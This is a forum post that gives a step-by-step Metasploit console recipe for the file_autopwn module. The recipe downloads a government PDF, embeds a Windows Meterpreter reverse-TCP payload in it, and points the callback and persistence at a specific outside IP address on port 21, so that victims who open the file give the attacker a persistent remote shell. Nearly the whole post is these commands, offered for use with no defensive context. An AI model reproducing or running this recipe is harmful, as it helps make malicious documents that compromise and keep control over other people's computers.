Jump to content

Metasploit Auxilary Module File_autopwn


operat0r_001
 Share

Recommended Posts

example output: http://rmccurdy.com/scripts/msf_shells/

Metasploit auxilary file_autopwn module - Video Tutorial

http://www.backtrack-linux.org/forums/back...o-tutorial.html

rm -Rf /tmp/1

mkdir /tmp/1

rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases...es/nga10_02.pdf

./msfconsole

db_driver sqlite3

db_create pentest11

# setting the LHOST to non IP can cause issues

setg LHOST 75.139.158.51

setg LPORT 21

# I just need the files I dont care if the http server ever runs ..

setg SRVPORT 21

# defualt is 3333

setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf

set SSL true

set ExitOnSession false

set PAYLOAD windows/meterpreter/reverse_tcp

setg PAYLOAD windows/meterpreter/reverse_tcp

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

run

Edited by operat0r_001
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...